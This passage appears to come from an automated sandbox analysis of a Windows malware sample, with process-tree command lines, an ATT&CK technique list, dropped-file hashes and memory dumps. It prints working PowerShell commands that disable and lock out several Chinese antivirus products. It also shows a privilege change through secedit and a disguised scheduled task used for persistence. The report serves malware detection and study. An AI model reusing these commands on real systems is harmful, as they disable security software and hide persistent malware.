        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2028
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c echo.>c:\inst.ini
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3056
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚÑ¶µçÄÔ¹Ü¼Ò' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðÉ½¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Filesize
3KB

MD5
69c282fdcd177c1ac4d6709ef841da65

SHA1
575cbac132f5215c9446e6b440ca44a2082f0644

SHA256
943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

SHA512
6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

Download Submit
C:\ProgramData\Microsoft\Program\ziliao.jpg

Filesize
225KB

MD5
e5ab6b8cfffbc61f2d8ce34ff30eade1

SHA1
c74d686a35db1f184d8b1504e6c859f79195ea6a

SHA256
6cbc3fd72edc8acd987ceed8d0f3b7585623956f8dbea156e2e115de5811bebe

SHA512
c30e074638ed9174d14337aead740eccfcbe2cdb87879a89705cac69ad1c3cb47cabce2dd83dc039a066c3a69069f292d5cfbf8f8fef1f46a8b8b56fa35c6702

Download Submit
C:\ProgramData\Program\Uninstall_.exe

Filesize
475KB

MD5
8d033e8817a7a1c54119523e668f5a32

SHA1
579aec8780f968e6e7809e5899bf91d79a026485

SHA256
5d75ab6114577bcd82dd2705da8cc33c86bdc9c9fcd0f00a9756aeb18f13f96a

SHA512
909145a965f4a550b8e00bfb598b3f475ba7c8ee50d053e74f7208baed335b7f75dab3de1667921f07de4a8d6a44e6c23c355b681dee0a81189e6f09dcacd57d

Download Submit
C:\ProgramData\Program\iusb3mon.dat

Filesize
74KB

MD5
7db8e66ef74c2ba301c9de02a08aab79

SHA1
8e6fc2a3c2374d59602ed5cfc8db0cce528bff46

SHA256
9897994028e66eba4c5691fe6ab4d9df527580c8a48f42066e51a82bb6ae2ee9

SHA512
30f5f87c68b34d83a6805977d5f573a46ee2b52836b070368427e355aab5823dab617cbe946a93087335a52432ed8689eb527521427049fd4d5f15d01e205278

Download Submit
C:\ProgramData\Program\iusb3mon.exe

Filesize
475KB

MD5
e79f996b69d7fa546ed9235fdc0ee06d

SHA1
b1616a455947ef3f29a4b5afdeda99369fc20bf8

SHA256
ec7fcd3f4533d3514a9a42cbc41c40358eea47255bab1171146a5ccebaf20990

SHA512
c0fd12425188d81be78be91facace2a036b81e29ffe4fde13b613a40bc20b39c656f1e0d91542b87973ffd2bc44e05b0354ecb1a488d391ee68f48cf43b44cf6

Download Submit
C:\ProgramData\templateWatch.dat

Filesize
59KB

MD5
02ad2cd3401ba2b6535ca8c4c59cdca8

SHA1
0054da15c86ec69825d7b35c24bc59ae166b237a

SHA256
c05212a3b64061a29f774c854f53fe91f13da53728be15acb14aeb56cba715de

SHA512
045ec50ecb801f5713930fa37e2e08ff0341d98c38842b5c61954c20feb1ce15a90a3b73b4edacdd1b21b64566e4757e90e155b9a417b9d2ff9fa533f5360333

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log

Filesize
2KB

MD5
84d68259f9ef9eed8a0506d0e3ee64c5

SHA1
3f794f6c237fd19b2a89bd3356d94f92f47d4e0c

SHA256
1c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20

SHA512
b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log

Filesize
2KB

MD5
c6f29cf6f15bc123d0ac663038ccf886

SHA1
ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

SHA256
467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

SHA512
c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

Filesize
1KB

MD5
1ceb5165f1e435a8132c403c6542ae95

SHA1
cd650376bce0babd4b07b31ad595da00c8d2ed1a

SHA256
e5bb3bd3f3b81693d0727993a631950aee7f100f23d5090ec20e320bb0813dbf

SHA512
b01b4ef1dba12736e5155a3111e23b74bfaba900239b116d3d5e9a190cb7775a8d42049b1db91d069845e585ec8004fc415bdd061b8efd73dd719f4f8a3b9953

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

Filesize
2KB

MD5
380c0bb0dff3c47f06e90e6908a34d1a

SHA1
ed7b26eafb1de476cb2e701fc278a509b367a77d

SHA256
b5c4688241bf8318161a0f72358ed49979e0b805e3277330322f2b659328d68e

SHA512
51d46e2c827e314540190ab06b6f28356aedecd7d8a7aaacc221a54d54f9a8538e60bfe7c1c75b6b1eeb9f432fdd2d5af46c77d8dde4966f45d96ebde49b5ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
1KB

MD5
26f969af9fe091926bbf9be6bf8cefe8

SHA1
70ae93fef3db23d35dfdc7701d05a3c4dbde76c5

SHA256
0d1362f342923bdd2f4585be8fc853e9fbfa8c83ba89f9be6ee302c8e6b2d1c8

SHA512
67e464b386f513e0e1b1f37d523778c258b785f89168e28f8ecedb6a0b6a361ca982ae47e6f915b49be1f4d0e10dd62a2a194bc84276f81b4af961ab76959278

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
2KB

MD5
5a18280aed20e8cc704c6211597e4195

SHA1
4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

SHA256
4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

SHA512
49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG

Filesize
6KB

MD5
e39405e85e09f64ccde0f59392317dd3

SHA1
9c76db4b3d8c7972e7995ecfb1e3c47ee94fd14b

SHA256
cfd9677e1c0e10b1507f520c4ecd40f68db78154c0d4e6563403d540f3bf829f

SHA512
6733f330145b48d23c023c664090f4f240e9bbeb8368b486c8ee8682ec6a930b73275e24075648d1aa7e01db1ec7b7e259286917a006ba9af8fb7cba3439070a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
47ee9c1bc1a5abba691246a6db0e203d

SHA1
d29a80bb0df2bea5ba8cae8d57794447d4a6fb9d

SHA256
53ce551d6a17c85eed0ba9f3172771b019955140b3f5943e2b2407238b6ae973

SHA512
001a8f50abe6d30820e4cca7d4d8e9876916bc32873270ece2f75a53d30e0659dc927fd4f919778b7f14310c4ab8e94481dbbd8ae0fc48e0f3406603bc594023

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQB67YCDGBBUWYR8IYX3.temp

Filesize
7KB

MD5
4b91eecc1bd6bcda06545b38f6a0ed0c

SHA1
3a21d01bbd478d66fdbd85c9913e12b9feb06ff5

SHA256
301df03a5df6896504a4d0fc387aa0cbf12894650600202f0ba6b582613e70fd

SHA512
e400cc6f9de626bb6e3aa81b1bff5d8b37e94ba6f0eb8a8d0ba83b3f3d04bd6d885f06b3fa3784a049f2414ebc7c668d9d8a7ebaa942c160691cac19a7fac7f9

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
2a7d5f8d3fb4ab753b226fd88d31453b

SHA1
2ba2f1e7d4c5ff02a730920f0796cee9b174820c

SHA256
879109ae311e9b88f930ce1c659f29ec0e338687004318661e604d0d3727e3cf

SHA512
fa520ebf9e2626008f479c6e8f472514980d105f917c48ad638a64177d77c82a651c34ed3f28f3e39e67f12e50920503b66e373b5e92cf606bc81dc62a6b3ea4

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
329KB

MD5
958103e55c74427e5c66d7e18f3bf237

SHA1
cea3fc512763dc2ba1cfa9b7cb7a46ae89d9fcd8

SHA256
3ea4a4c3c6dea44d8917b342e93d653f59d93e1f552ace16e97e43bb04e951d8

SHA512
02ed6e1f24ef8f7f1c0377fa86a3a494b8a4474472ab7001f7902f2f3afa6cd975dc69fcab6f5524545a67657ecccfcd4ed2c95431843e9d50f2fff4c5178dbe

Download Submit
memory/2712-55-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2712-56-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2904-105-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2904-78-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2904-140-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2904-111-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2904-102-0x0000000000570000-0x000000000057F000-memory.dmp

Filesize
60KB

Download
memory/2904-98-0x0000000010000000-0x0000000010004000-memory.dmp

Filesize
16KB

Download
memory/2904-97-0x0000000000560000-0x0000000000562000-memory.dmp

Filesize
8KB

Download
memory/2904-231-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download